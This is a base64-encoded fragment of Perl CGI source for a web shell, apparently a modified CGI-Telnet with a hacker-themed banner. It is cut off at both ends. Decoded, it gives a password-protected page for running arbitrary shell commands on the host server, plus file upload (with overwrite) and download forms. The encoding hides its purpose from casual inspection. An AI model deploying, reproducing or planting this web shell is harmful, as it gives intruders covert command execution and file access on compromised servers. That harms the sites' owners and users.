nVmZmVyID0gIiYiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI7IiAmJiB0aGlzLmluSFRNTEVudGl0eSkgewogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gIjsiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOwogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMuSFRNTEVudGl0eUJ1ZmZlcjsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSB7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICB9CiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gdGhpcy5jdXJyZW50VGV4dDsKICAgIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgKz0gKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCAtIDEgPyAodHlwZW9mIHRoaXMuY3Vyc29yID09ICJmdW5jdGlvbiIgPyB0aGlzLmN1cnNvcih0aGlzLmN1cnJlbnRUZXh0KSA6IHRoaXMuY3Vyc29yKSA6ICIiKTsKICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsKICB9IGVsc2UgewoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOwoJdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgICAgICAgdGhpcy5ydW5uaW5nID0gZmFsc2U7CiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7CiAgfQp9Cjwvc2NyaXB0Pgo8L3ByZT4KCjxmb250IHN0eWxlPSJmb250OiAxNXB0IFZlcmRhbmE7IGNvbG9yOiB5ZWxsb3c7Ij5Db3B5cmlnaHQgKEMpIDIwMDEgUm9oaXRhYiBCYXRyYSA8L2ZvbnQ+PGJyPjxicj4KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgd2lkdGg9IjYwMCIgaGVpZ2g+Cjx0Ym9keT48dHI+Cjx0ZCB2YWxpZ249InRvcCIgYmFja2dyb3VuZD0iaHR0cDovL2RsLmRyb3Bib3guY29tL3UvMTA4NjAwNTEvaW1hZ2VzL21hdHJhbi5naWYiPjxwIGlkPSJoYWNrIiBzdHlsZT0ibWFyZ2luLWxlZnQ6IDNweDsiPgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+IFBsZWFzZSBXYWl0IC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+IDxicj4KCjxmb250IGNvbG9yPSIjMDA5OTAwIj4gVHJ5aW5nIGNvbm5lY3QgdG8gU2VydmVyIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPn5cJDwvZm9udD4gQ29ubmVjdGVkICEgPC9mb250Pjxicj4KPGZvbnQgY29sb3I9IiMwMDk5MDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+IENoZWNraW5nIFNlcnZlciAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuPC9mb250PiA8YnI+Cgo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD4gVHJ5aW5nIGNvbm5lY3QgdG8gQ29tbWFuZCAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPgoKPGZvbnQgY29sb3I9IiNGMDAwMDAiPjxmb250IGNvbG9yPSIjRkZGMDAwIj4kU2VydmVyTmFtZX48L2ZvbnQ+XCQgQ29ubmVjdGVkIENvbW1hbmQhIDwvZm9udD48YnI+Cjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PGZvbnQgY29sb3I9IiNGMDAwMDAiPlwkPC9mb250PjwvZm9udD4gT0shIFlvdSBjYW4ga2lsbCBpdCE8L2ZvbnQ+CjwvdHI+CjwvdGJvZHk+PC90YWJsZT4KPGJyPgoKPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPgpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsKVHlwaW5nVGV4dC5ydW5BbGwoKTsKCjwvc2NyaXB0PgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIEFkZCBodG1sIHNwZWNpYWwgY2hhcnMKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgSHRtbFNwZWNpYWxDaGFycygkKXsKCW15ICR0ZXh0ID0gc2hpZnQ7CgkkdGV4dCA9fiBzLyYvJmFtcDsvZzsKCSR0ZXh0ID1+IHMvIi8mcXVvdDsvZzsKCSR0ZXh0ID1+IHMvJy8mIzAzOTsvZzsKCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7CgkkdGV4dCA9fiBzLz4vJmd0Oy9nOwoJcmV0dXJuICR0ZXh0Owp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBBZGQgbGluayBmb3IgZGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIEFkZExpbmtEaXIoJCkKewoJbXkgJGFjPXNoaWZ0OwoJbXkgQGRpcj0oKTsKCWlmKCRXaW5OVCkKCXsKCQlAZGlyPXNwbGl0KC9cXC8sJEN1cnJlbnREaXIpOwoJfWVsc2UKCXsKCQlAZGlyPXNwbGl0KCIvIiwmdHJpbSgkQ3VycmVudERpcikpOwoJfQoJbXkgJHBhdGg9IiI7CglteSAkcmVzdWx0PSIiOwoJZm9yZWFjaCAoQGRpcikKCXsKCQkkcGF0aCAuPSAkXy4kUGF0aFNlcDsKCQkkcmVzdWx0Lj0iPGEgaHJlZj0nP2E9Ii4kYWMuIiZkPSIuJHBhdGguIic+Ii4kXy4kUGF0aFNlcC4iPC9hPiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGJyPkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KClBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSBmb3IgbG9nZ2luZyBpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRm9ybQp7CglwcmludCA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CkxvZ2luIDogQWRtaW5pc3RyYXRvcjxicj4KUGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IGNsYXNzPSJzdWJtaXQiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRNTCBQYWdlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPGJyPjxmb250IGNvbG9yPXJlZD5vLS0tWyAgPGZvbnQgY29sb3I9I2ZmOTkwMD5FZGl0IGJ5ICRFZGl0UGVyc2lvbiA8L2ZvbnQ+ICBdLS0tbzwvZm9udD48L2NvZGU+PC9jZW50ZXI+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2FpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9nb3V0CnsKCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUKCSZQcmludFBhZ2VIZWFkZXIoInAiKTsKCSZQcmludExvZ291dFNjcmVlbjsKCgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7CglleGl0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9naW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdAojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0CiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyCiMgdG8gbG9naW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ2luIAp7CglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZAoJewoJCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD0kTG9naW5QYXNzd29yZDtcbiI7CgkJJlByaW50UGFnZUhlYWRlcjsKCQlwcmludCAmTGlzdERpcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoKCQl9CgkJJlByaW50TG9naW5Gb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJZXhpdDsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJbXkgJGRpcj0gIjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiY29tbWFuZCIpLiI8L3NwYW4+IjsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiPGZvbnQgY29sb3I9JyM2NmZmNjYnPlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJDwvZm9udD4gIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+Cgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgokUHJvbXB0CjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI1MCIgbmFtZT0iYyI+CjxpbnB1dCBjbGFzcz0ic3VibWl0InR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZURvd25sb2FkRm9ybQp7CglteSAkZGlyID0gJkFkZExpbmtEaXIoImRvd25sb2FkIik7IAoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+CiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IGNsYXNzPSJmaWxlIiB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+Cgo8L2Zvcm0+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2FkIGZpbGVzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0KewoJbXkgJGRpcj0gJkFkZExpbmtEaXIoInVwbG9hZCIpOwoJJFByb21wdCA9ICRXaW5OVCA/ICIkZGlyID4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQgIjsKCXJldHVybiA8PEVORDsKPGZvcm0gbmFtZT0iZiIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CiRQcm9tcHQgdXBsb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCBjbGFzcz0iZmlsZSIgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+Ck9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgaWQ9InVwIiB2YWx1ZT0ib3ZlcndyaXRlIj4KPGxhYmVsIGZvcj0idXAiPk92ZXJ3cml0ZSBpZiBpdCBFeGlzdHM8L2xhYmVsPjxicj48YnI+ClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4KCjwvZm9ybT4KCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBDb21tYW5kVGltZW91dAp7CglpZighJFdpbk5UKQoJewoJCWFsYXJtKDApOwoJCXJldHVybiA8PEVORDsKPC90ZXh0YXJlYT4KPGJyPjxmb250IGNvbG9yPXllbGxvdz4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLjwvZm9udD4KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250PgpFTkQKCX0KfQoKCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXIKIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gKIyBmZWF0dXJlIHRoYXQgc3RhcnRzIHRoZSBkb3dubG9hZCBhdXRvbWF0aWNhbGx5LgojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50RG93bmxvYWRMaW5rUGFnZQp7Cglsb2NhbCgkRmlsZVVybCkgPSBAXzsKCW15ICRyZXN1bHQ9IiI7CglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBleGlzdHMKCXsKCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOwoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsKCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkcmVzdWx0IC49IDw8RU5EOwpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LAo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPgpFTkQKCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJfQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdAoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkRmlsZVVybDogJCEiOwoJCSRyZXN1bHQgLj0gJlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbXkgJHJlc3VsdCA9ICIiOwoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJCWV4aXQoMSk7Cgl9CgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQoJewoJCSRyZXN1bHQgLj0gIkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhIjsKCQkkcmVzdWx0IC49JlByaW50RmlsZURvd25sb2FkRm9ybTsKCX0KCXJldHVybiAkcmVzdWx0Owp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWx